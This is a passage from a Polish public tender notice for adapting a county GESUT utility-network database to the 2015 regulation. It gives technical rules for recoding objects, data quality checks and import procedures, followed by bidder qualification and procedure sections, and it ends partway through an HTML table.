uwagi "trójnik", jeśli w polu "dotychczasowy kod obiektu" wpisano "mufa" zamienić na obiekt Punkt inny GUPEPI oraz wpisać w polu uwagi "mufa" , chyba że obiekt ten jest połączony z 3 lub więcej osiami przewodów to wtedy w polu uwagi wpisać "trójnik"; - 66 inne urządzenia techniczne sieci telekomunikacyjnej - zmiana na „słupek telekomunikacyjny” (jeżeli istnieje wpis "słupek telekomunikacyjny" lub „słupek teletechniczny” w polu uwagi);Należy zweryfikować punkty początkowe i końcowe, wierzchołkowe obiektu „przewód” . Wszystkie te punkty wprowadzono w bazie danych GESUT jako punkty robocze o kodzie GSPPRB. Należy zamienić je na:- obiekt o kodzie GUPxPI – „Punkt inny”,- obiekt o kodzie GUPxNP – „Dalszy przebieg nieznany”.W przypadku braku armatury w punktach węzłowych sieci GESUT wprowadzić obiekt o kodzie GUPxPI – Punkt inny z uwagą „Trójnik”.W bazie danych GESUT wprowadzono 5515 włazów i 5352 studzienek. Na podstawie kart studni lub informacji zawartych w państwowym zasobie geodezyjnym i kartograficznym (operaty) należy zweryfikować obiekt „studzienka”. Średnice studzienek bądź komór pozyskiwać tylko z kart studzienek lub operatów udostępnionych przez Zamawiającego.Obiektem studzienka pozyskujemy urządzenia techniczne związane z siecią uzbrojenia terenu, w przypadkach gdy rzuty poziome obrysów: włazu i komory tych obiektów pokrywają się. (Należy wprowadzić tylko jeden obiekt punktowy bądź powierzchniowy, nie należy wprowadzać dodatkowo włazu).W przypadku sieci telekomunikacyjnej studzienka powinna przyjmować kształt włazu, jeśli ten docelowo będzie usunięty(przejdzie do historii).Jeżeli studzienka i właz mają różny kształt, ale wchodzą „punktowo” – wstawić studzienkę punktową o kształcie zgodnym z kształtem włazu tylko w przypadku sieci telekomunikacyjnej i energetycznej, w pozostałych przypadkach wstawić studzienki okrągłe.Zgodnie z § 18. rozporządzenia Ministra Administracji i Cyfryzacji z dnia 21 października 2015 r. w sprawie powiatowej bazy GESUT i krajowej bazy GESUT (Dz. U. z 2015 poz.1938) klasę obiektów SUUS reprezentuje urządzenie techniczne związane z siecią uzbrojenia terenu. Reprezentacją geometryczną klasy obiektów SUUS jest:a. punkt, jeżeli wymiary podłużne i poprzeczne są nie większe niż 0,75 m;b. linia, jeżeli jeden z wymiarów: podłużny lub poprzeczny, jest większy od 0,75 m;c. powierzchnia, jeżeli wymiary podłużne i poprzeczne są większe od 0,75 m.Uwaga! Powyższe reguły nie dotyczą wszystkich obiektów z klasy SUUS i w § 18. Rozporządzenia Ministra Administracji i Cyfryzacji z dnia 21 października 2015 r. w sprawie powiatowej bazy GESUTi krajowej bazy GESUT są zdefiniowane pewne wyjątki zaimplementowane w GEO-INFO.Obiekt punktowy ‘Latarnia’ należy wprowadzić jako obiekt z grupy „Inne obiekty GESUT” o kodzie: GUPISL - Słup, wieża lub maszt i uzupełnić atrybuty "Rodzaj słupa" - słup oraz "Z latarnią " 1 - tak. Do poprawy ok.1465 obiektów ( w bazie istnieją zdublowane obiekty GUPISL , jeden jako słup, drugi jako latarnia połączone relacją). W przewodach elektroenergetycznych należy uzupełnić atrybut "Oświetleniowy" , zgodnie z przebiegiem sieci. W przypadku gdy sieć podziemna przyjmuje wartość Oświetleniowy – „TAK” , przewód oprzeć na jednym obiekcie „Słup”, którego rodzaj to „Latarnia”.Przewody wodociągowe o średnicy większej lub równej 400 przyjmują wartość funkcji – przesyłowy.Sieci połączone bezpośrednio z kratkami ściekowymi, hydrantami, wylotami kanałów latarniami, punktami świetlnymi, słupkami teletechnicznymi przyjmują funkcję przewodu – „inna”.W bazie danych występuje 1460 obiektów „Zmiana cech przewodu”. Należy przeanalizować występowanie tego obiektu. W przypadku, gdy obiekt „Zmiana cech przewodu” łączy się z trzema lub więcej przewodami sieci należy go zamienić na obiekt „Punkt inny” i w polu uwagi wpisać „trójnik”.4. Weryfikacja i poprawa położenia punktów wejścia/wyjścia do/z budynkówW prowadzonej bazie GESUT istnieje 7203 wejść/wyjść do/ z budynków z czego 1920 wejść/wyjść do/z budynków, należy poprawić wg poniższych zasad:- jeżeli punkt wejścia przewodu do budynku nie styka się z obrysem budynku (budynek w bazie danych EGB wprowadzony z digitalizacji lub fotogrametrii i brak możliwości wprowadzenia współrzędnych narożników budynku z operatu) to:• przesuwamy punkt wejścia/wyjścia przedłużając lub docinając przyłącze na ścianę budynku, jeśli wielkość przesunięcia jest nie większa niż 0,15 m,(1085 przyłączy)• jeśli odległość przesunięcia punktu jest większa niż 0,15 m to należy przeliczyć punkt wejścia/wyjścia przewodu do/z budynku zgodnie z miarą na szkicu. ( 835 przyłączy) Zaleca się definiować przyłącza zgodnie z kierunkiem przepływu (tzn. w przypadku wody, elektroenergetyki, gazu geometria od sieci do budynku, w przypadku kanalizacji odwrotnie). Jeżeli w miejscu wejścia/wyjścia przewodów występuje obiekt GUPxSH – punkt o określonej wysokości sieci, obiekt ten należy zharmonizować z wejściem/wyjściem.Obiekt typu rynna (kanalizacja deszczowa) należy wprowadzić obiektem o kodzie GUPKU – „Inne urządzenie techniczne bez symbolu” z opisem w polu „Uwagi” „Rynna”.5. Kontrola zmodernizowanych baz.Wykonawca wykona wszystkie możliwe kontrole programowe Geo-Info 7. Z przygotowanej bazy danych zostaną wygenerowane raporty, które potwierdzą, iż zostały uzupełnione brakujące dane oraz wyeliminowane dane podlegające wykreśleniu. Wykonawca potwierdzi przeprowadzenie wszystkich dostępnych w systemie Geo – Info 7 kontroli, raportem podpisanym przez kierownika robót. Wykonawca załaduje bazę testową, udostępnioną przez Zamawiającego, plikami wsadowymi.6. Technologia dostosowania istniejącej numerycznej bazy danych GESUT Warunki wykorzystania baz danych:a)	ODGK wyda Wykonawcy inicjalny plik w formacie .giv. Dzięki temu Wykonawca będzie mógł automatycznie „zamawiać” i otrzymywać pliki .giv zawierające dane różnicowe. Wykonawca zobowiązany jest do cyklicznego pobierania plików różnicowych generowanych z bazy ODGK. Okres, co ile należy pobrać plik różnicowy należy uzgodnić z ODGK.b)	Aktualizacja bazy GESUT będzie prowadzona w siedzibie Zamawiającego przez cały czas trwania prac . Zablokowanie bazy przewiduje się na minimalną ilość dni niezbędną dla zaczytania danych do bazy GESUT. W związku z powyższym zaleca się częste pobieranie aktualnej bazy danych.Wykonawca powiadomi Zamawiającego pisemnie o potrzebie utworzenia środowiska testowego podczas zamawiania ostatniego exportu danych wraz ze zgłoszeniem gotowości przekazania opracowania do kontroli.Przed złożeniem operatu opracowane dane wynikowe dotyczące GESUT Wykonawca wprowadzi do testowej bazy GESUT w formie przygotowanych wcześniej plików .Technologia wprowadzania i wgrywania danych do bazy będzie na bieżąco ustalana pomiędzy Zamawiającym a Wykonawcą. Przed oddaniem opracowania do ośrodka Wykonawca będzie zobowiązany do wykonania stosownych kontroli dostępnych w programie Geo-Info, aby wyeliminować możliwie największą ilość błędów w bazie. Wykonawca powinien sporządzić raporty poprawności bazy pod względem ilościowym, jakościowym oraz powierzchniowym. Raporty należy przedstawić Zamawiającemu, a następnie usunąć wynikłe rozbieżności. Niezależnie od Wykonawcy Zamawiający przed odbiorem dokona kontroli bazy testowej. Pozytywny wynik kontroli bazy testowej i operatu będzie warunkiem przyjęcia operatu do kontroli końcowej.Wszystkie załączniki (każda strona) wchodzące w skład operatu technicznego powstałe w wyniku realizacji pracy lub otrzymane z powiatowego ośrodka dokumentacji geodezyjnej i kartograficznej winny być opisane, autoryzowane przez bezpośredniego wykonawcę i kierownika roboty. Wszystkie dane opisowo-informacyjne wpisane odręcznie winny być czytelne i wyraźne dla jednoznacznego odczytu. Wszystkie dokumenty oraz pliki, które powstały w wyniku realizacji zamówienia, wyniki analiz, raporty kontrolne winny być przekazane na nośniku informatycznym.7. Załadowanie danych do bazy GESUT.Wykonawca dokona importu do bazy GESUT . Na czas importu baza danych będzie zablokowana. Wykonawca uzupełni opracowanie o operaty przyjęte do zasobu w trakcie zablokowania – jeśli termin zablokowania przekroczy 14 dni. Wykonawca po przyjęciu operatu do zasobu zeskanuje go i zaewidencjonuje w sposób wskazany przez Zamawiającego.WYKONAWCA ODPOWIADA ZA PRZEPROWADZENIE IMPORTU DO BAZY ZAMAWIAJĄCEGO.Wykonawca podepnie do bazy danych GESUT dokumenty stanowiące podstawę dokonania zmiany (np. szkice polowe, karty rejestru przewodów, mapy przebiegu przewodów itp.), jeżeli w wyniku analizy dokumentacji stwierdzi brak podpięcia do bazy. Sposób podpięcia zostanie uzgodniony z Zamawiającym przed załadowaniem danych.8. Zasady kompletowania i zawartość operatu .Całość wykonanych prac należy skompletować w formie operatu, którego częściami składowymi są:operat techniczny - szczegółowe zasady kompletowania operatu podane są w rozporządzeniu Ministra Spraw Wewnętrznych i Administracji z dnia 9 listopada 2011 r. w sprawie standardów technicznych wykonywania geodezyjnych pomiarów sytuacyjnych i wysokościowych oraz opracowywania i przekazywania wyników tych pomiarów do państwowego zasobu geodezyjnego i kartograficznego (Dz. U. z 2011r. Nr 263, poz.1572)– rozdział 5 oraz baza danych. Wszystkie dokumenty muszą zawierać datę opracowania, nazwę wykonawcy i nazwisko osoby sporządzającej. Dokumenty należy kompletować w tomach posiadających spisy zawartości. Dopuszcza się elektroniczną formę dokumentów operatu, po uzgodnieniu z Zamawiającym.IV.	UWAGI KOŃCOWE.1.	Wszelkie uzgodnienia z Wykonawcą będą odbywały się pisemnie lub za pośrednictwem poczty elektronicznej.2.	Wszelkie szkice polowe należy podpiąć do bazy danych oraz uzupełnić ich zakres.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">72311000-1</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>72320000-4</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów – szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2020-11-13</span> <br /> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w miesiącach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Okres w dniach</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data rozpoczęcia</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Data zakończenia</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'></TD><TD style='border: 1px solid black;border-collapse: collapse;'> </TD><TD style='border: 1px solid black;border-collapse: collapse;'>2020-11-13</TD></TR></TABLE> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Zamawiający nie stawia warunku w ww. zakresie,</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia warunku w ww. zakresie,</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow"> Zamawiający uzna ww. warunek za spełniony, jeżeli wykonawca wykaże, że: a) w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności krótszy w tym okresie wykonał: - co najmniej jedną usługę polegającą na dostosowaniu istniejącej bazy GESUT opracowanej na podstawie przepisów wcześniej obowiązujących do przepisów rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku, potwierdzonej załadowaniem do krajowej bazy GESUT;- założył bazę GESUT zgodnie z przepisami rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku i załadowanie bazy do krajowej bazy GESUTb) dysponuje lub będzie dysponował:- co najmniej jedną osobą do kierowania pracami geodezyjnymi, posiadającą wykształcenie geodezyjne, z uprawnieniami o których mowa w art. 43 ust. 1 ustawy z dnia 17 maja 1089 roku - Prawo geodezyjne i kartograficzne;- co najmniej jedną która ukończyła kurs administratorów Geo-Info potwierdzone certyfikatem;(dla ww pozycji dopuszcza się łączenie funkcji).</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">wykazu usług:- co najmniej jedną usługę polegającą na dostosowaniu istniejącej bazy GESUT opracowanej na podstawie przepisów wcześniej obowiązujących do przepisów rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku, potwierdzonej załadowaniem do krajowej bazy GESUT;- założył bazę GESUT zgodnie z przepisami rozporządzenia w sprawie powiatowej bazy GESUT i krajowej bazy GESUT z 21 października 2015 roku i załadowanie bazy do krajowej bazy GESUT;wykonanych nie wcześniej niż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych nadal wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Wzór wykazu usług stanowi Załącznik nr 5 do SIWZ.wykazu osób:- co najmniej jedną osobą do kierowania pracami geodezyjnymi, posiadającą wykształcenie geodezyjne, z uprawnieniami o których mowa w art. 43 ust. 1 ustawy z dnia 17 maja 1089 roku - Prawo geodezyjne i kartograficzne;- co najmniej jedną która ukończyła kurs administratorów Geo-Info potwierdzone certyfikatem;lub odpowiadające im uprawnienia wydane na podstawie wcześniej obowiązujących przepisów prawa, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.Wzór wykazu osób stanowi Załącznik nr 6 do SIWZ.dokumentów dotyczących podmiotu trzeciego, w celu wykazania braku istnienia wobec niego podstaw wykluczenia oraz spełnienia, w zakresie, w jakim Wykonawca powołuje się na jego zasoby, warunków udziału w postępowaniu - jeżeli wykonawca polega na zasobach podmiotu trzeciego. </span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1)	Formularz ofertowy sporządzony i wypełniony według wzoru stanowiącego Załącznik nr 1 2)	Oświadczenie, o którym mowa w rozdziale 7.1 SIWZ według wzoru stanowiącego załącznik nr 2 do SIWZ 3)	Oświadczenie, o którym mowa w rozdziale 7.1 SIWZ według wzoru stanowiącego załącznik nr 3 do SIWZ 4)	Pełnomocnictwo do reprezentowania wykonawcy (wykonawców występujących wspólnie), o ile ofertę składa pełnomocnik.5)	Zobowiązanie podmiotu trzeciego, o którym mowa w rozdziale 6.5.1) i 6.5.4) SIWZ – jeżeli wykonawca polega na zasobach lub sytuacji podmiotu trzeciego – według wzoru stanowiącego załącznik nr 8 do SIWZ.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Nie</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium"></span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej"></span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej"></span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow"></span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow"></span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie"></span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow"></span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow"></span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci">Nie</span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: 